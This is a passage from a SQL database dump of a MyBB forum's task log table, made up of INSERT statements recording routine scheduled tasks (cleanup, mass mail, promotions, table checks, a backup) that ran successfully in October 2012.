task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12329', '3', '1351019868', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12330', '9', '1351019914', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12331', '5', '1351019921', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12332', '1', '1351019929', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12333', '7', '1351019931', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12334', '5', '1351022742', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12335', '9', '1351022773', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12336', '3', '1351023057', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12337', '1', '1351023062', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12338', '7', '1351023080', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12339', '9', '1351023103', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12340', '5', '1351023982', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12341', '9', '1351023990', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12342', '3', '1351024551', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12343', '9', '1351025094', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12344', '5', '1351025170', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12345', '9', '1351027771', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12346', '3', '1351027798', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12347', '1', '1351027811', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12348', '7', '1351028663', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12349', '5', '1351028683', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12350', '3', '1351028694', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12351', '9', '1351028721', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12352', '5', '1351028723', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12353', '9', '1351029327', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12354', '3', '1351029666', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12355', '1', '1351029864', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12356', '7', '1351029907', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12357', '5', '1351030037', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12358', '9', '1351030211', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12359', '5', '1351031141', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12360', '9', '1351031149', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12361', '3', '1351031406', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12362', '9', '1351032040', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12363', '5', '1351032355', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12364', '9', '1351032943', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12365', '3', '1351034181', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12366', '1', '1351034191', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12367', '7', '1351034199', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12368', '5', '1351034297', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12369', '9', '1351034498', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12370', '5', '1351034724', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12371', '9', '1351034836', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12372', '3', '1351035036', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12373', '9', '1351035751', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12374', '5', '1351036003', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12375', '9', '1351038398', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12376', '3', '1351038413', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12377', '1', '1351038449', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12378', '2', '1351038454', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12379', '7', '1351038457', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12380', '11', '1351038461', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12381', '5', '1351038621', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12382', '3', '1351038856', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12383', '9', '1351039877', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12384', '5', '1351039911', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12385', '9', '1351040161', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12386', '3', '1351040343', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12387', '1', '1351040508', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12388', '7', '1351040511', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12389', '5', '1351040784', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12390', '9', '1351041459', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12391', '5', '1351041967', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12392', '9', '1351041981', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12393', '3', '1351042355', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12394', '9', '1351042905', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12395', '5', '1351043368', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12396', '9', '1351043822', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12397', '3', '1351043975', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12398', '1', '1351044045', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12399', '7', '1351044047', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12400', '5', '1351044312', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12401', '9', '1351044685', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12402', '5', '1351045526', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12403', '9', '1351045921', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12404', '3', '1351045950', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12405', '9', '1351046963', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12406', '5', '1351047013', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12407', '9', '1351047571', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12408', '3', '1351047823', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12409', '1', '1351047827', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12410', '7', '1351047922', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12411', '5', '1351047989', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12412', '9', '1351048992', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12413', '5', '1351049181', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12414', '9', '1351049240', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12415', '3', '1351049649', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12416', '9', '1351050051', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12417', '5', '1351050350', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12418', '9', '1351051066', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12419', '3', '1351051246', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12420', '1', '1351051557', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12421', '7', '1351051575', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12422', '5', '1351051679', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12423', '9', '1351051836', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12424', '5', '1351052751', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12425', '9', '1351052782', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12426', '3', '1351054398', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12427', '9', '1351054443', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12428', '5', '1351054451', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12429', '9', '1351055409', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12430', '3', '1351055466', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12431', '1', '1351055498', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12432', '7', '1351055526', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12433', '5', '1351055739', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12434', '5', '1351056605', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12435', '9', '1351057038', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12436', '3', '1351057256', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12437', '9', '1351057587', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12438', '5', '1351057785', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12439', '9', '1351058453', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12440', '3', '1351059628', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12441', '1', '1351060006', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12442', '7', '1351060019', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12443', '5', '1351060104', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12444', '9', '1351060268', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12445', '3', '1351060309', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12446', '9', '1351060895', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12447', '5', '1351061172', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12448', '9', '1351061800', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12449', '3', '1351061943', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12450', '1', '1351062042', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12451', '7', '1351062047', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12452', '5', '1351062331', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12453', '9', '1351062960', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12454', '5', '1351063967', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12455', '9', '1351064118', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12456', '3', '1351064127', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12457', '9', '1351064545', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12458', '5', '1351064708', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12459', '9', '1351065452', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12460', '3', '1351065562', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12461', '1', '1351065632', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12462', '7', '1351065641', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12463', '5', '1351065934', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12464', '9', '1351066221', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12465', '5', '1351067435', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12466', '9', '1351067450', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12467', '3', '1351067483', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12468', '9', '1351068098', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12469', '5', '1351069300', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12470', '9', '1351069388', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12471', '3', '1351069394', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12472', '1', '1351069401', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12473', '7', '1351069405', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12474', '5', '1351070818', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12475', '9', '1351071761', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12476', '3', '1351072016', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12477', '5', '1351074382', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12478', '9', '1351074408', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12479', '3', '1351076374', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12480', '1', '1351076379', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12481', '7', '1351077006', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12482', '9', '1351077738', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12483', '5', '1351077761', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12484', '1', '1351077935', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12485', '5', '1351077947', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12486', '9', '1351078297', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12487', '3', '1351078315', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12488', '9', '1351079217', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12489', '5', '1351079223', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12490', '9', '1351079713', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12491', '3', '1351080110', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12492', '1', '1351080116', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12493', '4', '1351080185', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12494', '7', '1351080522', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12495', '5', '1351080533', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12496', '9', '1351083720', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12497', '5', '1351083728', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12498', '3', '1351083869', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12499', '1', '1351089365', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12500', '7', '1351089391', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12501', '5', '1351089451', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12502', '9', '1351089528', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12503', '3', '1351089539', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12504', '9', '1351089691', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12505', '5', '1351090274', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12506', '9', '1351090701', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12507', '3', '1351090753', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12508', '1', '1351090999', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12509', '7', '1351091007', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12510', '5', '1351091119', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12511', '9', '1351091442', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12512', '5', '1351092364', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12513', '9', '1351092488', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12514', '3', '1351092649', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12515', '9', '1351093233', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12516', '5', '1351093524', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12517', '9', '1351094214', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12518', '3', '1351094402', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12519', '1', '1351094478', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12520', '7', '1351094479', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12521', '5', '1351094711', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12522', '9', '1351096298', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12523', '5', '1351096539', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12524', '3', '1351096612', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12525', '9', '1351097063', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12526', '5', '1351097198', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12527', '9', '1351097853', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12528', '3', '1351099132', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12529', '1', '1351099163', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12530', '7', '1351099168', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12531', '5', '1351099195', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12532', '9', '1351099266', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12533', '5', '1351099677', 'The promotions task successfully ran.'); INSERT INTO 